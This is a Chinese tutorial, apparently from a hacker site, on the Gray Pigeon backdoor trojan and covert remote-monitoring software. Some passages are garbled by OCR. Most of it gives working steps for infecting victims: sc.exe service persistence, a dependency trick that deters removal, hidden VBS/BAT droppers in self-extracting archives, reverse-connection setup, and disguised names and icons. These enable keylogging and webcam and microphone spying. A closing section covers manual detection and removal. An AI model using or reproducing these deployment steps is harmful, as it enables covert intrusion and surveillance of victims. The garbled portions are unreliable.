灰鴿子使用教程圖解

1、灰鴿子使用教程圖解（考慮到灰鴿子技術(shù)性較強和傳插黑客技術(shù)要低調(diào)，將網(wǎng)絡(luò)人遠(yuǎn)程控制教程放第一部 份，灰鴿子教程放在了文章后面第二部份，請大家耐心觀看）第一部份：網(wǎng)絡(luò)人遠(yuǎn)程監(jiān)控軟件網(wǎng)絡(luò)人遠(yuǎn)程控制個人版分為Netman辦公版與Netman監(jiān)控版。兩個版本主要區(qū)別在于:Netman辦公版連接遠(yuǎn)程電腦時，對方會彈出提示，知道電腦正在遠(yuǎn)程連接，主要用于個人遠(yuǎn)程控制、遠(yuǎn)程辦公、遠(yuǎn)程協(xié)助和遠(yuǎn)程桌面連接等方面使用，是一款免費的遠(yuǎn)程控制軟件；Netman監(jiān)控版使用會員登錄后再連接，遠(yuǎn)程電腦無任何提示，對方不會發(fā)覺，主要用于監(jiān) 管孩童電腦，掌握孩子上網(wǎng)情況，保護孩子健康上網(wǎng)。Netman監(jiān)控版詳細(xì)安裝方法:1.要實

2、現(xiàn)遠(yuǎn)程監(jiān)控控制， 雙方都要安裝 Netman監(jiān)控版，雙方電腦的安裝方法一樣, 控制端同時也是被控端，只要知道ID和密碼，雙方可以互相控制。文件迢）漏極 直看 收藏I工具 幫助豹地址亡）C:Documents and Setting$Admini5trsto- netman文韓和文件真任務(wù)J創(chuàng)建一個新文件夾 T將這文件夾發(fā)布到u共享此文件夾忖Etm前統(tǒng)亡V5.SS0 -teJ*-W1 KB2.57 MEffiArW其它僅疊黨面我的丈檔共亭文檔我的電腦網(wǎng)上鄰居P個對象2下載軟件解壓縮后，雙擊Netman監(jiān)控版.EXE”，軟件默認(rèn)安裝路徑為C:ProgramFilesNetman ”，可以自己修改，

3、但安裝路徑需要記住，因為啟動軟件桌面上不會新建快捷方式，需要自己進入安裝文件夾，雙擊iexplore.exe啟動軟件，這時會彈出一個提示窗口，問是否要讓軟件隨系統(tǒng)啟動，通常直接點“確定”。缶 CAProgram FilcsNctman回團立珪 徧錯劇 豆看莘 痕耀嚀 工貝収） 幫肋1 #G，範(fàn)O 苗尸鮭仁文燼函A.Frosrsi* Fil#i 我的丈檔我的電腦 網(wǎng)上鄰屆其它僅置：-1匚:Jrogram Files.Netman史運-二丘云瓷*玄件和宜樣真任等點擊確定，程序特隨系舷動,否則理序簾不會自啟動_逹她揮確定.白啟前選頃iJtplareNtmar Apolicatior遠(yuǎn)甦控腹便冃說鑰艮

4、尊逞下鴕/T3* Maxthon Dccumsnt -flj 23 KGApliiik 立件版本. 創(chuàng)建日期 2010-T-22 15:59 大申：7SB K T8B KE ；：.a a Js團更伶需這亍立眸稲動這乍文伴Q樂制這亍丈件 對將遠(yuǎn)!丈件發(fā)布事 它tfsbJ比電子郵件璀式發(fā)送 亠此立件X側(cè)關(guān)這于文件匚二葡定二二1職消Unin 乳 Netman Uninst我的電腦3.完成以上操作后，再按ctrl+y即可呼出軟件主界面。監(jiān)控版必須使用會員登錄才能實現(xiàn)監(jiān)控功能，所以呼出主界面后，應(yīng)點擊免費注冊會員。4.注冊好會員后，點“選項”-“會員登錄”，填上注冊好的會員號。5. 第一次

5、使用會員登錄時，會彈出“設(shè)置控制密碼”選項，需要注意的是，這里修改的不是前面填寫的“登錄密碼”，而是從其他電腦連接本電腦時需要輸入的“控制密碼”。很多用戶會誤以為這里是修改“登錄密碼”，導(dǎo)致第二次使用會員登錄時，發(fā)現(xiàn)登錄密碼不正確。出于安全考慮，網(wǎng)絡(luò)人設(shè)置了“登錄密碼”與“控制密碼”兩道密碼保護，“登錄密碼”用于登錄會員ID，“控制密碼”則是其他電腦想要控制本地電腦時所需要填寫的密碼。想要修改這兩個密碼，可點擊“選項”-“修改密碼”6. 設(shè)置好密碼密碼后，點右上角的關(guān)閉按扭，軟件就會在后臺運行，桌面上看不到任何圖標(biāo)和提示。想要再次操作軟件，請按下ctrl+y鍵。右上角的關(guān)閉按扭只是將軟件界面關(guān)

6、閉，想要徹底退出軟件，應(yīng)點擊左上角的“文件” -“退出”。很多用戶想要卸載軟件時，發(fā)現(xiàn)無卸載，就是因為沒有退出程序造成。7. 有同樣的方法在另一臺電腦安裝Netman監(jiān)控版并使用另一個會員登錄，在“遠(yuǎn)程IP/ID ”處輸入對方的會員ID和控制密碼，點擊“連接”即可連接遠(yuǎn)程電腦。優(yōu)化連接速度。通常不建議選擇“中轉(zhuǎn)”，因為連接速度正常時， 選上反而會使得速度變慢。在沒選擇的情況下，軟件會根據(jù)網(wǎng)絡(luò)狀況， 自行判斷是否通過服務(wù)器中轉(zhuǎn)。軟件還有許多設(shè)置選項，在不了解功能的情況下，不要隨意修改。O Nt 0/U031 血33)Or0腳自陽)。饑呵0無敵CZ/OTlEA(Ln/jOIAINIK*1*!】F

7、J o時鳧：mKm*eWcrrl0.Q MGIA通？.;lihuuiuiE 益FjtCCl 2M2用方峯他Hj(J 蛛?yún)f(xié) i/ 電也卻皓的曲片】人=咖 訶知上班弔4聲關(guān)SS1*酥抿忌J5用出3烹噸卻蟻LWK站中衣 圭山陀西可或功匹謂用口放廿WlWi第二部份:灰鴿子教程準(zhǔn)備工具：鴿子服務(wù)端IcoSprite圖標(biāo)更改器;SC.exe服務(wù)添加刪除更改工具;winrar程序特點：自解壓形式，雙擊即可制作過程：1. 首先自己配置一下鴿子服務(wù)端，配置時 啟動項設(shè)置 這里面的都不要填，不要寫 入注冊表，也不要用服務(wù)啟動。其他的隨你個人愛好。2. 用 SC 創(chuàng)建一個服務(wù)運行 CMD.EXE 在 system3

8、2 的目錄下運行執(zhí)行SC.exe create huigezi BinPath= %systemroot%system32gezi.exe type=own type= interact start= auto DisplayName= gezi 這 句 是 用 SC 建 立 一 個 服 務(wù) ， 服 務(wù) 名 為 huigezi ， 路 徑 Binpath 為 %systemroot%system32gezi.exe ，類型 type 為 own 與 interact 交互，啟動類型 start 為自 動，顯示名 DisplayName 為 gezi 。sc.exe descript_ion h

9、uigezi 不死鴿子 這句是將 huigezi 服務(wù)的描述改為“不死鴿子”sc config wuauserv depend= huigezi配置 huigezi 使 wuauserv 服務(wù)依存此服務(wù) （ wuauserv 可以根據(jù)自己喜歡改成其它服務(wù)， 這里的 wuauserv 是系統(tǒng)在 Windows Update 網(wǎng)站的自動更新服務(wù)） 。這里的目的是迷惑管理員，使其不敢輕易停止我們生成的服務(wù)，自己也可以多加點。3. 將這些從注冊表導(dǎo)出，我個人經(jīng)驗是：瑞星,咔吧等的注冊表監(jiān)控不會對導(dǎo)入注冊表報警 . 我們將他命名為 1.reg4. 創(chuàng)建一個 BAT 文件 , 并命名為 update.ba

10、tregedit /s %systemroot%system321.reg%systemroot%system32gezi.exedel /q /f /s %systemroot%system321.regdel /q /f /s %systemroot%system32Update.vbsdel /q /f /s %systemroot%system32Update.bat5. 創(chuàng)建一個 vbs 并命名為 update.vbs目的是為了作用是令 bat 里的內(nèi)容以安靜模式執(zhí)行，這樣就可以讓 cmd 窗口跳出 來了，增加了不少隱蔽性。里面寫上如下代碼：On Error Resume Nexts

11、et wshshell=createobject (wscript_.shell)a=wshshell.run (cmd.exe /C %systemroot%system32Update.bat, 0, TRUE)6用我門配置出來的服務(wù)端， 并命名為run.exe,用run.exe做一個自解壓文件，并命名為 gezi.exe.。記得將解壓模式為全部隱藏.解壓后運行run.exe，當(dāng)然你的服務(wù)端要自己做免殺，這里我就不多說了。八仙過海 7.將 gezi.exe 1.reg Update.vbs Update.bat 再用 winrar 制作一個自解壓文件，解 壓到 %systemroot%sy

12、stem32 解壓后運行 Update.vbs當(dāng)然解壓模式依舊全部隱藏，替換同名文件現(xiàn)在用 rar 捆綁出來的文件很多殺軟都不殺，你也可以用系統(tǒng)自帶的捆綁機，或其他的捆綁機這個方法可以用到其他的木馬中捆出來的自解壓文件也可以自己再加工:去掉右鍵用 winrar 打開 灰鴿子第一章：軟件相關(guān)介紹：灰鴿子 VIP 專業(yè)版 1. 只用一個端口來傳輸所有通訊數(shù)據(jù)！ 普通同類軟件都用到了兩個或兩個以上的端口來 完成！2. 支持可以控制 Internet 連接共享、 HTTP 透明代理上網(wǎng)的電腦！軟件智能讀取系統(tǒng)設(shè) 定的代理服務(wù)器信息，無需用戶設(shè)置！3. 無需知道服務(wù)端IP,自動上線功能讓服務(wù)端自動上線報

13、道！灰鴿子專用的上線系統(tǒng)無需您注冊免費域名才能使用 ,同時也提供了備用上線方式，在我們的專用上線系統(tǒng)出現(xiàn)故障 時,您可以使用備用上線方式來使用自動上線功能。 在使用專用上線系統(tǒng)時, 你還可以控制 遠(yuǎn)程電腦通過 Socks5 代理來中轉(zhuǎn)自動上線。4 .自動上線可以在第一次設(shè)置分組,自定義上線圖像,上線備注等,這樣都可以讓你輕 而易舉的找到目標(biāo)主機, 同時設(shè)置連接密碼保證了服務(wù)主機的安全性！ 同時具用牽手版的搜 索符合條件主機的功能：a. 從主機窗口篩選：可以列出只有某個窗口的一批主機，可以輕松找到哪些人在玩某個游戲！b. 從主機進程篩選：可以列出運行了某個程序的一批主機,例如QQ.exe,就可以

14、找到打開了 QQ 的自動上線主機有哪些了！5. 文件管理：管理遠(yuǎn)程電腦的文件系統(tǒng),支持復(fù)制、粘貼、刪除，斷點下載、上傳文件或文件夾，文件內(nèi)容均以加密方式傳輸，確保通訊的安全性 .6. 遠(yuǎn)程控制命令：包括遠(yuǎn)程系統(tǒng)信息、剪切板信息、進程管理、窗口管理、鍵盤記錄、 服務(wù)管理、管理管理、 MS-DOS 模擬、代理服務(wù)控制！7. 注冊表編輯器：可以像操作本機注冊表一樣的編輯遠(yuǎn)程注冊表。8. 常用命令廣播，讓你控制主機眾多主機更多的方便！詳細(xì)的在線主機線表顯示了：主機 IP 地址，地址位置，電腦名稱，系統(tǒng)版本, 備注等信息 ,9. 除了具有語音監(jiān)聽、語音發(fā)送，還有遠(yuǎn)程視頻監(jiān)控功能，只有遠(yuǎn)程計算機有攝像頭，

15、且正常打開沒有被占用，那么你可以看到,遠(yuǎn)程攝像頭捕獲的圖片！還可以把遠(yuǎn)程攝像頭捕獲的畫面存為 Mpeg-1 格式 .遠(yuǎn)程語音也可以錄制成 Wav 聲音文件。10. 可以設(shè)置服務(wù)端開放 Socks5 代理服務(wù)器功能和 HTTP 代理服務(wù)功能！無需第三方軟 件支持！支持 Windows9x/ME/2000/Xp/2003 。11. 軟件附帶有四款實用工具：a. EXE 工具 : 可以修改任何 EXE 文件圖標(biāo)，支持真彩色！b. 內(nèi)網(wǎng)端口映射器 : 它允許你將局域網(wǎng)內(nèi)的服務(wù)映射到 internet 上，使你在局域網(wǎng)內(nèi) 部也能使用自動上線功能！c. FTP 服務(wù)器 : 可以開本機 FTP 服務(wù)！d.

16、Web服務(wù)器：可以建立一個簡單的 Web服務(wù)器！12. 服務(wù)端程序在 Windows 2000 / xp / 2003 可以以服務(wù)啟動 ,支持發(fā)送多種組合鍵 ,比 如:Ctrl+Alt+del等等,適用于管理服務(wù)器主機！遠(yuǎn)程屏幕捕獲還可以錄制為Mpeg-1文件格式13. 全中文友好操作界面，讓你一目了然，漂亮皮膚讓使用時也倍感親切！ 功能簡單介紹：【1】對遠(yuǎn)程計算機文件管理：模枋Windows 資源管理器，可以對文件進行復(fù)制、粘貼、刪除，重命名、遠(yuǎn)程運行等 ,可以上傳下載文件或文件夾 ,操作簡單易用?！?】遠(yuǎn)程控制命令：查看遠(yuǎn)程系統(tǒng)信息、剪切板查看、進程管理、服務(wù)管理、共享管 理！【3】捕獲屏

17、幕：不但可以連繼的捕獲遠(yuǎn)程電腦屏幕，還能把本地的鼠標(biāo)及鍵盤傳動作 送到遠(yuǎn)程實現(xiàn)實時控制功能！【4】視頻語音，可以監(jiān)控遠(yuǎn)程攝像頭,還有語音監(jiān)聽和發(fā)送功能，可以和遠(yuǎn)程主機進行語音對話！【5】telnet（超級終端）.【 6】注冊表模擬器：遠(yuǎn)程注冊表操作就像操作本地注冊表一樣方便！【 7】命令廣播：可以對自動上線主機進行命令廣播，如關(guān)機、重啟、打開網(wǎng)頁， 篩選符合條件的機等，點一個按鈕就可以讓 N 臺機器同時關(guān)機或進行其它操作！【 8】服務(wù)端以服務(wù)方式啟動，支持發(fā)送多種組合鍵，可以輕松管理遠(yuǎn)程服務(wù)器！【 9】專用的自動上線系統(tǒng)，直接使用灰鴿子注冊ID 即可實現(xiàn)遠(yuǎn)程服務(wù)端自動上線！【10】多種自動上線

18、方式：專用上線、DNS 解析域名、固定 IP 等，用戶自由選擇！注冊灰鴿子軟件后享有：1享用軟件的所有功能，沒有任何限制！2能使用對應(yīng)的灰鴿子注冊版本，能得到此版后期修正的正式版本！3可以使用我們的專用上線系統(tǒng)，無需其它域名和空間支持！4得到我們更好的技術(shù)服務(wù)！注： VIP 版 包括 VIP2005 、 Version 1.2、Version 2.0 ！企業(yè)版 用戶只能使用企業(yè)版！不能使用其它版本！5. 加入會員后，會自動加入官方論壇。享受官方技術(shù)支持 灰鴿子第二章：好馬配好鞍，服務(wù)端正確配置。灰鴿子是一款要交錢的軟件，也就是說，你使用 VIP 版的話是要交給作者每年幾十塊 錢的使用費 （不作

19、任何評論） 因此網(wǎng)上也就有很多高手破解灰鴿子， 讓灰鴿子可以不用到灰 鴿子的官方網(wǎng)站進行驗證， 從而可以不用交錢就可以使用， 相關(guān)版本有： 影子鷹破解專用版， 愛兒破解版，以及華夏黑客聯(lián)盟的灰鴿子 sunray 破解版。今天我們就用 灰鴿子 sunray 破解版 來向大家詳細(xì)解析這款木馬的服務(wù)端配置方式，只可實驗，不可做壞事，大家不喜歡請?zhí)^這一章。第一節(jié)：未雨綢繆，實驗準(zhǔn)備。第一 ,關(guān)閉殺毒軟件， 這點不用我說了吧 因為是木馬， 下載了之后如果殺毒軟件監(jiān)控開著的話肯定會被刪除的。第二，當(dāng)然是下載灰鴿子的軟件啦 上網(wǎng)找，有很多 第三， 申請一個免費的主頁空間， 為什么要呢？因為灰鴿子是可以反彈

20、式鏈接的， 也就 是說，服務(wù)端通過登陸你的主頁的特定文件就可以主動連接到你的電腦讓你控制了。 （這一 點，等一下會詳細(xì)解說）第二節(jié)：實戰(zhàn)開始。 把我們剛才下來的文件解壓到某個文件夾，記住，不要改文件夾的名字，后面會用到。 解壓的文件里面有以下幾個文件：H_Client.exe 這個是客戶端的主要文件，可以配置文件，生成服務(wù)端，可以遠(yuǎn)程控制客 戶端。http.exe 這個是本地 http 服務(wù)器，因為我們的灰鴿子是破解版的，通常正式版的灰鴿子 會到官方的服務(wù)器上去驗證你的軟件是否正版， 所以這個軟件就是用來在本機子上建一個服 務(wù)器，騙過軟件的，從而達(dá)到破解的目的。sunray.exe這個里面其實

21、也就只是一個host,它把 這個網(wǎng)站的域名本地解析到本機，而不是解析到官方網(wǎng)站。 vip_2005_0113.rar 這個是驗證的軟件，當(dāng)我 們的軟件解析到本機的時候它就會下載這一個到客戶端，用來驗證用的。其它的文件還有 config2005.asp ， Operate.ini 還有四個文件夾，他們分別是 (dat images login sound) 我也不知道什么用的。應(yīng)該是配置用的。第 一 步 ： 在 你 的 電 腦 上 新 建 一 個 ip.txt 的 文 本 文 件 ， 內(nèi) 容 如 下 ： http:/huigezi3:8000end 其中 212.126

22、.131.43 這個是我的電腦 IP 地址，8000 是連 接的端口，你可以把它寫成你自己的 IP 地址，端口一般不要去改動，然后把這個文件上傳 到你剛才申請的空間 ,如果你的電腦是動態(tài) IP 的話，那你就要經(jīng)常更新這個文件的內(nèi)容，然 后上傳到空間，它的目的是客戶端上線的話就會去這個網(wǎng)站讀取這個文件，然后主動和你取得連接。第二步，首先運行 sunray.exe,然后運行 http.exe點開始服務(wù)！第三步，運行客戶端，也就是 H_Client.exe 這個文件，點擊“自動上線”選項，有幾個要點要說的，1) “備用自動上線，URL 轉(zhuǎn)向域名或網(wǎng)頁文件，這里呢，填寫你剛才申請到的網(wǎng)站空間地址和ip

23、.txt，比如http:/你的網(wǎng)站地址/ip.txt (當(dāng)然，如果你是固定IP的話呢，可以寫你的 IP 地址，那么前面的申請空間，上傳文件幾步可以省略)2) “自動連接密碼” ，這個是表示你可以連接到的電腦所要用到的密碼，如果為空的 話，也沒什么大不了的，頂多就是別人也可以用你的“肉雞”3) “配置說明”建議你把“只使用備用自動上線”前的勾打上，因為我們的軟件是破解 版的，官方的那個服務(wù)器我們是用不了啦 4) “用戶名稱” “用戶密碼”這兩個地方亂填些數(shù)字進去就行了，破解版用不了正式版 的服務(wù)器的，它是服務(wù)器用來驗證軟件是否“正版”用的?！鞍惭b選項”選項卡，建議修改一下名字，以免被發(fā)現(xiàn)，其它的

24、自己看著辦，看著喜歡就選吧a_a“啟動項”這個很重要，建議你修改一下名字，它主要是服務(wù)端隨系統(tǒng)自動啟動用的， 也是自己看著辦。 其中的 “生成服務(wù)” 這一項是為了達(dá)到隱藏用的，這也是我們經(jīng)常說的手工清除木馬的關(guān)鍵。 也是長期以來很多人說無法清除灰鴿子的原因，因為它寫成了服務(wù)， 這個的優(yōu)先級是系統(tǒng)級的，所有使用這臺電腦的用戶都會啟動木馬?！按矸?wù)” ，嘻嘻，就是你控制的電腦可以給我們做為一臺代理服務(wù)器，說不定人家 公布出來的代理服 務(wù)器地址有一部分是這些電腦的哦 “高級選項”這里主要是用來對付殺毒軟件和防火墻用的，默認(rèn)是插入 IEXPLORER ， 啟動隱藏文件隱藏插入的 IE 進程，以及使用

25、 UPX 壓縮，這里就不用去改它的，默認(rèn)就行。服務(wù)器圖標(biāo)”是用來偽裝用的，你自己選項自己喜歡的圖標(biāo)吧配置好了就點擊生成服務(wù)器， 軟件會優(yōu)先從官方驗證， 但沒效， 出錯了后就從本地服務(wù) 器驗證，這就是我們要本機建 http 服務(wù)器的原因。好了，到此，服務(wù)端就生成了，不要運 行它，運行了你就會中木馬的， （不準(zhǔn)做壞事）軟件使用方法：當(dāng)別人中了你的木馬后，它會從你的網(wǎng)站讀取 ip.txt 這個文件，然后主 動連接到你的電腦， 如果你此時也打開了客戶端的話， 連接建立成功， 你可以控制這臺電腦 了。具體有什么內(nèi)容你自己摸索，如果你是動態(tài) IP 地址的話，那么你要每次把新的 ip.txt 上傳到網(wǎng)站上去

26、 沒有路由密碼權(quán)限時的鴿08-23上網(wǎng)安全 Vista 自我防范10-11讓瀕臨崩潰的 Win dows XP 10-11有備無患，快速自制救急10-11要你好看 !Windows 看圖工10-11 空間贊助網(wǎng)提供不同類型10-11討論 net.exe 禾口 net1.exe 的10-10 讓 3389 遠(yuǎn)程桌面?zhèn)鬏敻?0-1巧妙入侵滲透賭博站10-10 Aspx空間掃權(quán)限工具 10-10Windows2003最新提權(quán)工具 10-10 易淘樂提供100M免費全能10-10系統(tǒng)開機密碼忘了不著急10-09 中意網(wǎng)絡(luò)提供免費100M免10-09與眾不同 Windows XP開始10-08 讓桌面

27、圖標(biāo)翻跟斗在XP上10-08上海寬元站長資助計劃 -提10-08 個性化 Windows XP的任務(wù)10-07趣盤提供 3G 免費網(wǎng)絡(luò)硬盤10-07秀山熱線提供200MB 免費全10-07一次艱辛的提權(quán)過程10-06成功入侵IT大賣場的滲透10-06mysqlhack- MYSQL利用工10-06 lanker 一句話PHP 后門客戶10-06WIXI 提供 3G 免費多媒體網(wǎng)10-06 新人網(wǎng)絡(luò)提供100M/ftp 免10-06如何利用QQ帶來高流量10-05 UuShare提供免費網(wǎng)絡(luò)文件10-05推薦灰鴿子超級詳細(xì)教程（看了就會）熱 薦 灰鴿子超級詳細(xì)教程（看了就會）文章整理發(fā)布：黑客風(fēng)

28、云 文章來源： 更新時間： 2007-1-1613:12:53灰鴿子第三章：服務(wù)端工作方式：灰鴿子是國內(nèi)一款著名后門。 比起前輩冰河、 黑洞來， 灰鴿子可以說是國內(nèi)后門的集大 成者。 其豐富而強大的功能、 靈活多變的操作、 良好的隱藏性使其他后門都相形見絀。 客戶 端簡易便捷的操作使剛?cè)腴T的初學(xué)者都能充當(dāng)黑客。 當(dāng)使用在合法情況下時， 灰鴿子是一款 優(yōu)秀的遠(yuǎn)程控制軟件。但如果拿它做一些非法的事，灰鴿子就成了很強大的黑客工具。 這就好比火藥， 用在不同的場合， 給人類帶來不同 的影響。 對灰鴿子完整的介紹也許只有灰鴿子作者本人能夠說清楚， 在此我們只能進行簡要 介紹?；银澴涌蛻舳撕头?wù)端都是采用

29、Delphi 編寫。 黑客利用客戶端程序配置出服務(wù)端程序?？膳渲玫男畔⒅饕ㄉ暇€類型（如等待連接還是主動連接）、主動連接時使用的公網(wǎng)IP （域名）、連接密碼、使用的端口、啟動項名稱、服務(wù)名稱，進程隱藏方式，使用的殼，代理，圖標(biāo)等等。服務(wù)端對客戶端連接方式有多種，使得處于各種網(wǎng)絡(luò)環(huán)境的用戶都可能中毒，包括局域網(wǎng)用戶（通過代理上網(wǎng)）、公網(wǎng)用戶和 ADSL 撥號用戶等。下面介紹服務(wù)端：配置出來的服務(wù)端文件文件名為G_Server.exe （這是默認(rèn)的，當(dāng)然也可以改。G_Server.exe 運行后將自己拷貝到 Windows 目錄下 （98/xp 下為系統(tǒng)盤的 windows 目錄， 2k/NT

30、下為系統(tǒng)盤的 Winnt 目錄 ），然后再從體內(nèi)釋放 G_Server.dll 和 G_Server_Hook.dll 到 windows 目錄下。 G_Server.exe、 G_Server.dll 和 G_Server_Hook.dll 三個文件相互配合組成了 灰鴿子服務(wù)端， G_Server_Hook.dll 負(fù)責(zé)隱藏灰鴿子。通過截獲進程的 API 調(diào)用隱藏灰鴿子 的文件、服務(wù)的注冊表項，甚至是進程中的模塊名。截獲的函數(shù)主要是用來遍歷文件、遍歷注冊表項和遍歷進程模塊的一些函數(shù)。所以， 有些時候用戶感覺種了毒， 但仔細(xì)檢查卻又發(fā)現(xiàn)不了什么異常。有些灰鴿子會多釋放出一個名為 G_Serve

31、rKey.dll 的文件用來記 錄鍵盤操作。注意， G_Server.exe 這個名稱并不固定，它是可以定制的，比如當(dāng)定制服務(wù)端 文件名為 A.exe 時，生成的文件就是 A.exe、 A.dll 和 A_Hook.dll 。Windows 目錄下的 G_Server.exe 文件將自己注冊成服務(wù) （ 9X 系統(tǒng)寫注冊表啟動項） ，每 次開機都能自動運行， 運行后啟動 G_Server.dll 和 G_Server_Hook.dll 并自動退出。 G_Server.dll 文件實現(xiàn)后門功能，與控制端客戶端進行通信； G_Server_Hook.dll 則通過攔截 API 調(diào)用來 隱藏病毒。因此

32、，中毒后，我們看不到病毒文件，也看不到病毒注冊的服務(wù)項。隨著灰鴿子 服務(wù)端文件的設(shè)置不同， G_Server_Hook.dll 有時候附在 Explorer.exe 的進程空間中，有時候 則是附在所有進程中。灰鴿子的作者對于如何逃過殺毒軟件的查殺花了很大力氣。由于一些 API 函數(shù)被截獲， 正常模式下難以遍歷到灰鴿子的文件和模塊， 造成查殺上的困難。 要卸載灰鴿子動態(tài)庫而且 保證系統(tǒng)進程不崩潰也很麻煩，因此造成了近期灰鴿子在互聯(lián)網(wǎng)上泛濫的局面?；银澴拥谒恼拢弘p管齊下，手工和軟件清除灰鴿子。一 .灰鴿子的手工檢測由于灰鴿子攔截了 API 調(diào)用，在正常模式下服務(wù)端程序文件和它注冊的服務(wù)項均被隱 藏

33、，也就是說你即使設(shè)置了“顯示所有隱藏文件”也看不到它們。此外，灰鴿子服務(wù)端的文 件名也是可以自定義的，這都給手工檢測帶來了一定的困難。但是， 通過仔細(xì)觀察我們發(fā)現(xiàn)， 對于灰鴿子的檢測仍然是有規(guī)律可循的。 從上面的運行 原理分析可以看出， 無論自定義的服務(wù)器端文件名是什么， 一般都會在操作系統(tǒng)的安裝目錄 下生成一個以“ _hook.dll ”結(jié)尾的文件。通過這一點，我們可以較為準(zhǔn)確手工檢測出灰鴿子 服務(wù)端。由于正常模式下灰鴿子會隱藏自身，因此檢測灰鴿子的操作一定要在安全模式下進行。進入安全模式的方法是：啟動計算機，在系統(tǒng)進入Windows 啟動畫面前，按下 F8 鍵 （或者在啟動計算機時按住 C

34、trl 鍵不放 ），在出現(xiàn)的啟動選項菜單中，選擇“ Safe Mode ”或“安全 模式”。1、由于灰鴿子的文件本身具有隱藏屬性， 因此要設(shè)置 Windows 顯示所有文件。 打開“我 的電腦”，選擇菜單“工具” “文件夾選項” ，點擊“查看” ，取消“隱藏受保護的操作系 統(tǒng)文件”前的對勾，并在“隱藏文件和文件夾”項中選擇“顯示所有文件和文件夾” ，然后 點擊“確定” 。2、打開 Windows 的“搜索文件” ，文件名稱輸入“ _hook.dll ”，搜索位置選擇 Windows 的安裝目錄（默認(rèn) 98/xp 為 C:windows ，2k/NT 為 C:Winnt ）。3、經(jīng)過搜索， 我們

35、在 Windows 目錄（不包含子目錄） 下發(fā)現(xiàn)了一個名為 Game_Hook.dll 的文件。4、根據(jù)灰鴿子原理分析我們知道，如果Game_Hook.DLL 是灰鴿子的文件，則在操作系統(tǒng)安裝目錄下還會有 Game.exe 和 Game.dll 文件。打開 Windows 目錄，果然有這兩個文件， 同時還有一個用于記錄鍵盤操作的 GameKey.dll 文件。經(jīng)過這幾步操作我們基本就可以確定這些文件是灰鴿子 服務(wù)端了，下面就可以進行手 動清除。二、灰鴿子的手工清除 經(jīng)過上面的分析， 清除灰鴿子就很容易了。 清除灰鴿子仍然要在安全模式下操作， 主要 有兩步： 1、清除灰鴿子的服務(wù)； 2 刪除灰鴿

36、子程序文件。注意：為防止誤操作，清除前一定要做好備份。（一）、清除灰鴿子的服務(wù) 注意清除灰鴿子的服務(wù)一定要在注冊表里完成， 對注冊表不熟悉的網(wǎng)友請找熟悉的人幫 忙操作，清除灰鴿子的服務(wù)一定要先備份注冊表，或者到純 DOS 下將注冊表文件更名，然后在去注冊表刪除灰鴿子的服務(wù)。因為病毒會和EXE 文件進行關(guān)聯(lián) 2000 XP 系統(tǒng)：1、 打開注冊表編輯器（點擊“開始”“運行”，輸入“ Regedit.exe”，確定。），打開 HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices 注冊表項。2、 點擊菜單“編輯”“查找”，“查找目標(biāo)”輸入“ game.exe”，點擊確定，我們就 可以找到灰鴿子的服務(wù)項（此例為Game_Server,每個人這個服務(wù)項名稱是不同的）。3、刪除整個 Game_Server 項。98 me 系統(tǒng)：在 9X 下，灰鴿子啟動項只有一個，因此清除更為簡單。運行注冊表編輯器，打開HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentV ersionRun 項，我們立即看到